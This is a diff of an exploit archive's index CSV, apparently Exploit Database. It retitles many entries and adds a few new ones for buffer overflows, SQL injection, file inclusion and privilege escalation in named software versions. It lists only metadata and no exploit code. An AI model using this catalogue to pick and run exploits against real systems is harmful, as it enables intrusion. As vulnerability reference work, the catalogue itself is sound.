diff --git a/files.csv b/files.csv
index b0adf05ad..5f103298b 100644
--- a/files.csv
+++ b/files.csv
@@ -896,7 +896,7 @@ id,file,description,date,author,platform,type,port
 7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow (PoC)",2009-01-02,"aBo MoHaMeD",windows,dos,0
 7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)",2009-01-03,Encrypt3d.M!nd,windows,dos,0
 7673,platforms/multiple/dos/7673.html,"Apple Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0
-7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - (marquee) Denial of Service",2009-01-06,StAkeR,multiple,dos,0
+7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - Denial of Service",2009-01-06,StAkeR,multiple,dos,0
 7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - (user) Remote Buffer Overflow (PoC)",2009-01-07,Houssamix,windows,dos,0
 7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - '.aup' Remote Off-by-One Crash",2009-01-07,Stack,windows,dos,0
 7696,platforms/windows/dos/7696.pl,"Winamp GEN_MSN Plugin - Heap Buffer Overflow (PoC)",2009-01-07,SkD,windows,dos,0
@@ -5335,10 +5335,11 @@ id,file,description,date,author,platform,type,port
 40985,platforms/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,linux,dos,0
 40994,platforms/multiple/dos/40994.html,"Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing",2017-01-08,"Aaditya Purani",multiple,dos,0
 40996,platforms/php/dos/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",php,dos,0
-41008,platforms/multiple/dos/41008.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption",2017-01-11,COSIG,multiple,dos,0
+41008,platforms/multiple/dos/41008.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (1)",2017-01-11,COSIG,multiple,dos,0
 41012,platforms/multiple/dos/41012.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (2)",2017-01-11,COSIG,multiple,dos,0
 41018,platforms/windows/dos/41018.txt,"Boxoft Wav 1.0 - Buffer Overflow",2017-01-11,Vulnerability-Lab,windows,dos,0
 41025,platforms/windows/dos/41025.txt,"VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow",2016-05-27,"Patrick Coleman",windows,dos,0
+41030,platforms/windows/dos/41030.py,"SapLPD 7.40 - Denial of Service",2016-12-28,"Peter Baris",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -5967,7 +5968,7 @@ id,file,description,date,author,platform,type,port
 7681,platforms/linux/local/7681.txt,"Debian XTERM - (DECRQSS/comments)",2009-01-06,"Paul Szabo",linux,local,0
 7684,platforms/windows/local/7684.pl,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-01-06,Encrypt3d.M!nd,windows,local,0
 7688,platforms/windows/local/7688.pl,"Cain & Abel 4.9.25 - (Cisco IOS-MD5) Local Buffer Overflow",2009-01-07,send9,windows,local,0
-7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - (PlaylistSkin) Buffer Overflow",2009-01-07,"Jeremy Brown",windows,local,0
+7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - 'PlaylistSkin' Buffer Overflow",2009-01-07,"Jeremy Brown",windows,local,0
 7695,platforms/windows/local/7695.pl,"VUPlayer 2.49 - '.pls' Universal Buffer Overflow",2009-01-07,SkD,windows,local,0
 7702,platforms/windows/local/7702.c,"GOM Player 2.0.12.3375 - '.asx' Stack Overflow",2009-01-08,DATA_SNIPER,windows,local,0
 7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) - Language Catalog SEH Overflow",2009-01-08,Cnaph,windows,local,0
@@ -6501,7 +6502,7 @@ id,file,description,date,author,platform,type,port
 14630,platforms/windows/local/14630.py,"Mediacoder 0.7.5.4710 - 'Universal' Buffer Overflow (SEH)",2010-08-12,Dr_IDE,windows,local,0
 14633,platforms/windows/local/14633.py,"Xion Player 1.0.125 - Stack Buffer Overflow",2010-08-13,corelanc0d3r,windows,local,0
 14676,platforms/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 - '.m3u' Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,windows,local,0
-14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 - Buffer Overflow (SEH) (2)",2010-08-15,dijital1,windows,local,0
+14651,platforms/windows/local/14651.py,"Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (2)",2010-08-15,dijital1,windows,local,0
 14663,platforms/windows/local/14663.py,"MUSE 4.9.0.006 - '.m3u' Local Buffer Overflow",2010-08-16,"Glafkos Charalambous",windows,local,0
 14664,platforms/windows/local/14664.py,"MUSE 4.9.0.006 - '.pls' Local Universal Buffer Overflow (SEH)",2010-08-16,"Glafkos Charalambous",windows,local,0
 14673,platforms/windows/local/14673.py,"Triologic Media Player 8 - '.m3u' Local Universal Unicode Buffer Overflow (SEH)",2010-08-17,"Glafkos Charalambous",windows,local,0
@@ -7369,6 +7370,7 @@ id,file,description,date,author,platform,type,port
 20409,platforms/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 - Weak Encryption",2000-11-18,"Steven Alexander",windows,local,0
 20410,platforms/unix/local/20410.cpp,"Jan Hubicka Koules 1.4 - Svgalib Buffer Overflow",2000-11-20,Synnergy.net,unix,local,0
 20411,platforms/linux/local/20411.c,"Oracle 8.x - cmctl Buffer Overflow",2000-11-20,anonymous,linux,local,0
+41031,platforms/windows/local/41031.txt,"aSc Timetables 2017 - Buffer Overflow",2017-01-12,"Peter Baris",windows,local,0
 20417,platforms/osx/local/20417.c,"Tunnelblick - Privilege Escalation (1)",2012-08-11,zx2c4,osx,local,0
 20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 - Symlink Attack Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0
 20436,platforms/unix/local/20436.sh,"Apple Mac OSX 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell redirection Race Condition",2000-01-02,proton,unix,local,0
@@ -8060,7 +8062,7 @@ id,file,description,date,author,platform,type,port
 28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow (SEH)",2013-10-14,metacom,windows,local,0
 28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Buffer Overflow (SEH)",2013-10-15,metacom,windows,local,0
 28984,platforms/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local,0
-40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
+40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based + Gentoo) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
 29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
 29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
 29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0
@@ -8750,7 +8752,7 @@ id,file,description,date,author,platform,type,port
 40995,platforms/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,windows,local,0
 41015,platforms/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",windows,local,0
 41020,platforms/windows/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,windows,local,0
-41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak + Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
+41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
 41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
@@ -8928,7 +8930,7 @@ id,file,description,date,author,platform,type,port
 398,platforms/linux/remote/398.c,"rsync 2.5.1 - Remote Exploit (1)",2002-01-01,Teso,linux,remote,873
 399,platforms/linux/remote/399.c,"rsync 2.5.1 - Remote Exploit (2)",2002-01-01,Teso,linux,remote,873
 400,platforms/linux/remote/400.c,"GV PostScript Viewer - Remote Buffer Overflow (2)",2004-08-18,infamous41md,linux,remote,0
-404,platforms/linux/remote/404.pl,"PlaySMS 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",linux,remote,0
+404,platforms/linux/remote/404.pl,"PlaySms 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",linux,remote,0
 405,platforms/linux/remote/405.c,"XV 3.x - BMP Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,remote,0
 408,platforms/linux/remote/408.c,"Qt - '.bmp' Parsing Bug Heap Overflow",2004-08-21,infamous41md,linux,remote,0
 409,platforms/bsd/remote/409.c,"BSD TelnetD - Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23
@@ -10519,7 +10521,7 @@ id,file,description,date,author,platform,type,port
 16335,platforms/windows/remote/16335.rb,"WinComLPD 3.0.2 - Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
 16336,platforms/windows/remote/16336.rb,"NIPrint LPD - Request Overflow (Metasploit)",2010-12-25,Metasploit,windows,remote,0
 16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
-16338,platforms/windows/remote/16338.rb,"SAP SAPLPD 6.28 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
+16338,platforms/windows/remote/16338.rb,"SapLPD 6.28 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16339,platforms/windows/remote/16339.rb,"Motorola Timbuktu Pro - Directory Traversal / Arbitrary File Upload (Metasploit)",2010-11-24,Metasploit,windows,remote,0
 16340,platforms/windows/remote/16340.rb,"Oracle 8i - TNS Listener 'ARGUMENTS' Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0
 16341,platforms/windows/remote/16341.rb,"Oracle 8i - TNS Listener SERVICE_NAME Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0
@@ -11782,6 +11784,7 @@ id,file,description,date,author,platform,type,port
 20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 - JSP Source Disclosure",2000-11-21,"Wojciech Woch",jsp,remote,0
 20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 - bb-hist.sh HISTFILE Parameter File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0
 20414,platforms/unix/remote/20414.c,"Ethereal - AFS Buffer Overflow",2000-11-18,mat,unix,remote,0
+20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script (MS00-090)",2000-11-22,"Sandro Gauci",windows,remote,0
 20423,platforms/cgi/remote/20423.txt,"NCSA httpd-campas 1.2 - sample script Exploit",1997-07-15,"Francisco Torres",cgi,remote,0
 20425,platforms/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",multiple,remote,0
 20426,platforms/windows/remote/20426.html,"Microsoft Internet Explorer 5.5 - 'Index.dat' Exploit (MS00-055)",2000-11-23,"Georgi Guninski",windows,remote,0
@@ -15892,7 +15895,7 @@ id,file,description,date,author,platform,type,port
 873,platforms/php/webapps/873.txt,"phpDEV5 - Remote Default Insecure Users",2005-03-11,Ali7,php,webapps,0
 881,platforms/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection",2005-03-15,Mikhail,php,webapps,0
 889,platforms/php/webapps/889.pl,"phpBB 2.0.12 - Change User Rights Authentication Bypass",2005-03-21,Kutas,php,webapps,0
-892,platforms/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass (SQL Injection)",2005-03-21,kre0n,php,webapps,0
+892,platforms/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass",2005-03-21,kre0n,php,webapps,0
 897,platforms/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,php,webapps,0
 901,platforms/php/webapps/901.pl,"PunBB 1.2.2 - Authentication Bypass",2005-03-29,RusH,php,webapps,0
 907,platforms/php/webapps/907.pl,"phpBB 2.0.13 - 'downloads.php' mod Remote Exploit",2005-04-02,CereBrums,php,webapps,0
@@ -15901,7 +15904,7 @@ id,file,description,date,author,platform,type,port
 922,platforms/cgi/webapps/922.pl,"The Includer CGI 1.0 - Remote Command Execution (2)",2005-04-08,GreenwooD,cgi,webapps,0
 30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0
 923,platforms/cgi/webapps/923.pl,"The Includer CGI 1.0 - Remote Command Execution (3)",2005-04-08,K-C0d3r,cgi,webapps,0
-925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Admin Authentication Bypass (SQL Injection)",2005-04-09,LaMeR,asp,webapps,0
+925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Authentication Bypass",2005-04-09,LaMeR,asp,webapps,0
 928,platforms/php/webapps/928.py,"PunBB 1.2.4 - 'id' Parameter SQL Injection",2005-04-11,"Stefan Esser",php,webapps,0
 939,platforms/php/webapps/939.pl,"S9Y Serendipity 0.8beta4 - exit.php SQL Injection",2005-04-13,kre0n,php,webapps,0
 954,platforms/cgi/webapps/954.pl,"E-Cart 1.1 - (index.cgi) Remote Command Execution",2005-04-25,z,cgi,webapps,0
@@ -16050,7 +16053,7 @@ id,file,description,date,author,platform,type,port
 1468,platforms/php/webapps/1468.php,"Clever Copy 3.0 - Admin Auth Details / SQL Injection",2006-02-04,rgod,php,webapps,0
 1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 - (Style Changer/Demo Mod) SQL Injection",2006-02-05,SkOd,php,webapps,0
 1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - (PATH_INFO) Arbitrary Command Execution",2006-02-06,Hessam-x,cgi,webapps,0
-1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - (Authentication Bypass) SQL Injection",2006-02-06,Zodiac,asp,webapps,0
+1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - Authentication Bypass",2006-02-06,Zodiac,asp,webapps,0
 1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
 1482,platforms/php/webapps/1482.php,"SPIP 1.8.2g - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
 1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager connector.php) Arbitrary File Upload",2006-02-09,rgod,php,webapps,0
@@ -16656,7 +16659,7 @@ id,file,description,date,author,platform,type,port
 2387,platforms/asp/webapps/2387.txt,"Charon Cart 3.0 - (Review.asp) SQL Injection",2006-09-17,ajann,asp,webapps,0
 2388,platforms/php/webapps/2388.txt,"CMtextS 1.0 - (users_logins/admin.txt) Credentials Disclosure",2006-09-17,Kacper,php,webapps,0
 2389,platforms/php/webapps/2389.pl,"Alstrasoft e-Friends 4.85 - Remote Command Execution",2006-09-18,Kw3[R]Ln,php,webapps,0
-2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g - 'phpbb_root_path' Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0
+2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g - 'phpbb_root_path' Parameter Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0
 2391,platforms/php/webapps/2391.php,"Exponent CMS 0.96.3 - (view) Remote Command Execution",2006-09-19,rgod,php,webapps,0
 2392,platforms/php/webapps/2392.txt,"Pie Cart Pro - (Home_Path) Remote File Inclusion",2006-09-19,"Saudi Hackrz",php,webapps,0
 2393,platforms/php/webapps/2393.txt,"Pie Cart Pro - (Inc_Dir) Remote File Inclusion",2006-09-19,SnIpEr_SA,php,webapps,0
@@ -17036,7 +17039,7 @@ id,file,description,date,author,platform,type,port
 2888,platforms/php/webapps/2888.php,"Envolution 1.1.0 - (PNSVlang) Remote Code Execution",2006-12-03,Kacper,php,webapps,0
 2889,platforms/php/webapps/2889.pl,"QuickCart 2.0 - (categories.php) Local File Inclusion",2006-12-03,r0ut3r,php,webapps,0
 2890,platforms/php/webapps/2890.txt,"PHP-revista 1.1.2 - (adodb) Multiple Remote File Inclusion",2006-12-03,"Cold Zero",php,webapps,0
-2891,platforms/php/webapps/2891.txt,"cutenews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion",2006-12-04,DeltahackingTEAM,php,webapps,0
+2891,platforms/php/webapps/2891.txt,"CuteNews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion",2006-12-04,DeltahackingTEAM,php,webapps,0
 2894,platforms/php/webapps/2894.txt,"Phorum 3.2.11 - 'common.php' Remote File Inclusion",2006-12-06,Mr-m07,php,webapps,0
 2895,platforms/php/webapps/2895.pl,"J-OWAMP Web Interface 2.1b - (link) Remote File Inclusion",2006-12-07,3l3ctric-Cracker,php,webapps,0
 2896,platforms/php/webapps/2896.txt,"Tucows Client Code Suite (CSS) 1.2.1015 - File Inclusion",2006-12-08,3l3ctric-Cracker,php,webapps,0
@@ -17387,7 +17390,7 @@ id,file,description,date,author,platform,type,port
 3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 - 'ROOT_PATH' Remote File Inclusion",2007-03-13,the_day,php,webapps,0
 3473,platforms/php/webapps/3473.txt,"WebCreator 0.2.6-rc3 - (moddir) Remote File Inclusion",2007-03-13,the_day,php,webapps,0
 3476,platforms/php/webapps/3476.pl,"Zomplog 3.7.6 (Windows x86) - Local File Inclusion",2007-03-14,Bl0od3r,php,webapps,0
-3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - (comments.php id) SQL Injection",2007-03-14,WiLdBoY,php,webapps,0
+3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - 'id' Parameter SQL Injection",2007-03-14,WiLdBoY,php,webapps,0
 3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 - 'postpost.php' Remote Code Execution",2007-03-14,Dj7xpl,php,webapps,0
 3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 - Remote Authentication Bypass",2007-03-15,WiLdBoY,asp,webapps,0
 3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x - (usergroups.php) SQL Injection",2007-03-15,x666,php,webapps,0
@@ -17729,7 +17732,7 @@ id,file,description,date,author,platform,type,port
 4020,platforms/php/webapps/4020.php,"RevokeBB 1.0 RC4 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-01,BlackHawk,php,webapps,0
 4022,platforms/php/webapps/4022.htm,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion",2007-06-01,GoLd_M,php,webapps,0
 4025,platforms/php/webapps/4025.php,"Quick.Cart 2.2 - Remote File Inclusion / Local File Inclusion Remote Code Execution",2007-06-02,Kacper,php,webapps,0
-4026,platforms/php/webapps/4026.php,"PNPHPBB2 <= 1.2 - (index.php c) SQL Injection",2007-06-03,Kacper,php,webapps,0
+4026,platforms/php/webapps/4026.php,"PNPHPBB2 <= 1.2 - 'index.php' SQL Injection",2007-06-03,Kacper,php,webapps,0
 4029,platforms/php/webapps/4029.php,"Sendcard 3.4.1 - (Local File Inclusion) Remote Code Execution",2007-06-04,Silentz,php,webapps,0
 4030,platforms/php/webapps/4030.php,"EQdkp 1.3.2 - 'listmembers.php' SQL Injection",2007-06-04,Silentz,php,webapps,0
 4031,platforms/php/webapps/4031.txt,"Madirish Webmail 2.0 - (addressbook.php) Remote File Inclusion",2007-06-04,BoZKuRTSeRDaR,php,webapps,0
@@ -17806,7 +17809,7 @@ id,file,description,date,author,platform,type,port
 4142,platforms/php/webapps/4142.txt,"Girlserv ads 1.5 - (details_news.php) SQL Injection",2007-07-03,"Cold Zero",php,webapps,0
 4144,platforms/php/webapps/4144.php,"MyCMS 0.9.8 - Remote Command Execution (2)",2007-07-03,BlackHawk,php,webapps,0
 4145,platforms/php/webapps/4145.php,"MyCMS 0.9.8 - Remote Command Execution (1)",2007-07-03,BlackHawk,php,webapps,0
-4147,platforms/php/webapps/4147.php,"PNPHPBB2 <= 1.2i - viewforum.php SQL Injection",2007-07-03,Coloss,php,webapps,0
+4147,platforms/php/webapps/4147.php,"PNPHPBB2 <= 1.2i - 'viewforum.php' SQL Injection",2007-07-03,Coloss,php,webapps,0
 4150,platforms/php/webapps/4150.txt,"VRNews 1.1.1 - 'admin.php' Remote Security Bypass",2007-07-05,R4M!,php,webapps,0
 4151,platforms/php/webapps/4151.sh,"AsteriDex 3.0 - (callboth.php) Remote Code Execution",2007-07-05,"Carl Livitt",php,webapps,0
 4153,platforms/php/webapps/4153.txt,"PHPVID 0.9.9 - 'categories_type.php' SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0
@@ -18213,7 +18216,7 @@ id,file,description,date,author,platform,type,port
 4793,platforms/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A - (all modules) SQL Injection",2007-12-26,JosS,php,webapps,0
 4794,platforms/php/webapps/4794.pl,"XZero Community Classifieds 4.95.11 - Local File Inclusion / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps,0
 4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps,0
-4796,platforms/php/webapps/4796.txt,"PNPHPBB2 <= 1.2i - (printview.php PHPEx) Local File Inclusion",2007-12-26,irk4z,php,webapps,0
+4796,platforms/php/webapps/4796.txt,"PNPHPBB2 <= 1.2i - 'PHPEx' Parameter Local File Inclusion",2007-12-26,irk4z,php,webapps,0
 4798,platforms/php/webapps/4798.php,"ZeusCMS 0.3 - Blind SQL Injection",2007-12-27,EgiX,php,webapps,0
 4799,platforms/php/webapps/4799.txt,"Joovili 3.0.6 - 'joovili.images.php' Remote File Disclosure",2007-12-27,EcHoLL,php,webapps,0
 4800,platforms/php/webapps/4800.txt,"xml2owl 0.1.1 - showcode.php Remote Command Execution",2007-12-28,MhZ91,php,webapps,0
@@ -20378,7 +20381,7 @@ id,file,description,date,author,platform,type,port
 7599,platforms/asp/webapps/7599.txt,"ForumApp 3.3 - Remote Database Disclosure",2008-12-28,Cyber.Zer0,asp,webapps,0
 7600,platforms/php/webapps/7600.pl,"Flexphplink Pro - Arbitrary File Upload",2008-12-28,Osirys,php,webapps,0
 7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0
-7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - (Authentication Bypass) SQL Injection",2008-12-29,AnGeL25dZ,php,webapps,0
+7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - Authentication Bypass",2008-12-29,AnGeL25dZ,php,webapps,0
 7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
 7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
 7605,platforms/php/webapps/7605.php,"TaskDriver 1.3 - Remote Change Admin Password",2008-12-29,cOndemned,php,webapps,0
@@ -20416,29 +20419,29 @@ id,file,description,date,author,platform,type,port
 7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting",2009-01-02,ahmadbady,php,webapps,0
 7650,platforms/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection",2009-01-03,darkjoker,php,webapps,0
 7653,platforms/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,php,webapps,0
-7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0
-7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion",2009-01-04,StAkeR,php,webapps,0
-7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' SQL Injection",2009-01-04,DaiMon,php,webapps,0
+7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Parameter Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0
+7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 1.2i - (ModName) Multiple Local File Inclusion",2009-01-04,StAkeR,php,webapps,0
+7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' Parameter SQL Injection",2009-01-04,DaiMon,php,webapps,0
 7660,platforms/php/webapps/7660.txt,"PHPMesFilms 1.0 - (index.php id) SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0
 7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 - 'id' SQL Injection",2009-01-04,ZoRLu,php,webapps,0
 7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 - Blind SQL Injection",2009-01-04,darkjoker,php,webapps,0
 7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro - 'acc.mdb' Database Disclosure",2009-01-05,ByALBAYX,asp,webapps,0
-7666,platforms/asp/webapps/7666.txt,"Ayemsis Emlak Pro - (Authentication Bypass) SQL Injection",2009-01-05,ByALBAYX,asp,webapps,0
+7666,platforms/asp/webapps/7666.txt,"Ayemsis Emlak Pro - Authentication Bypass",2009-01-05,ByALBAYX,asp,webapps,0
 7667,platforms/php/webapps/7667.txt,"Joomla! Component simple_review 1.x - SQL Injection",2009-01-05,EcHoLL,php,webapps,0
 7668,platforms/php/webapps/7668.pl,"Cybershade CMS 0.2b - 'index.php' Remote File Inclusion",2009-01-05,JosS,php,webapps,0
 7669,platforms/php/webapps/7669.pl,"Joomla! Component com_na_newsdescription - (newsid) SQL Injection",2009-01-05,EcHoLL,php,webapps,0
-7670,platforms/php/webapps/7670.pl,"Joomla! Component com_phocadocumentation - 'id' SQL Injection",2009-01-05,EcHoLL,php,webapps,0
-7672,platforms/php/webapps/7672.txt,"phpauctionsystem - Cross-Site Scripting / SQL Injection",2009-01-05,x0r,php,webapps,0
+7670,platforms/php/webapps/7670.pl,"Joomla! Component com_phocadocumentation - 'id' Parameter SQL Injection",2009-01-05,EcHoLL,php,webapps,0
+7672,platforms/php/webapps/7672.txt,"PHPAuctionSystem - Cross-Site Scripting / SQL Injection",2009-01-05,x0r,php,webapps,0
 7674,platforms/php/webapps/7674.txt,"PHPAuctionSystem - Insecure Cookie Handling",2009-01-05,ZoRLu,php,webapps,0
 7678,platforms/php/webapps/7678.txt,"PHPAuctionSystem - Multiple Remote File Inclusion",2009-01-06,darkmasking,php,webapps,0
-7679,platforms/php/webapps/7679.php,"RiotPix 0.61 - (forumid) Blind SQL Injection",2009-01-06,cOndemned,php,webapps,0
+7679,platforms/php/webapps/7679.php,"RiotPix 0.61 - 'forumid' Parameter Blind SQL Injection",2009-01-06,cOndemned,php,webapps,0
 7680,platforms/php/webapps/7680.txt,"ezpack 4.2b2 - Cross-Site Scripting / SQL Injection",2009-01-06,!-BUGJACK-!,php,webapps,0
-7682,platforms/php/webapps/7682.txt,"RiotPix 0.61 - (Authentication Bypass) SQL Injection",2009-01-06,ZoRLu,php,webapps,0
+7682,platforms/php/webapps/7682.txt,"RiotPix 0.61 - Authentication Bypass",2009-01-06,ZoRLu,php,webapps,0
 7683,platforms/php/webapps/7683.pl,"Goople 1.8.2 - 'FrontPage.php' Blind SQL Injection",2009-01-06,darkjoker,php,webapps,0
 7686,platforms/php/webapps/7686.txt,"ItCMS 2.1a - Authentication Bypass",2009-01-06,certaindeath,php,webapps,0
-7687,platforms/php/webapps/7687.txt,"playSms 0.9.3 - Multiple Remote / Local File Inclusion",2009-01-06,ahmadbady,php,webapps,0
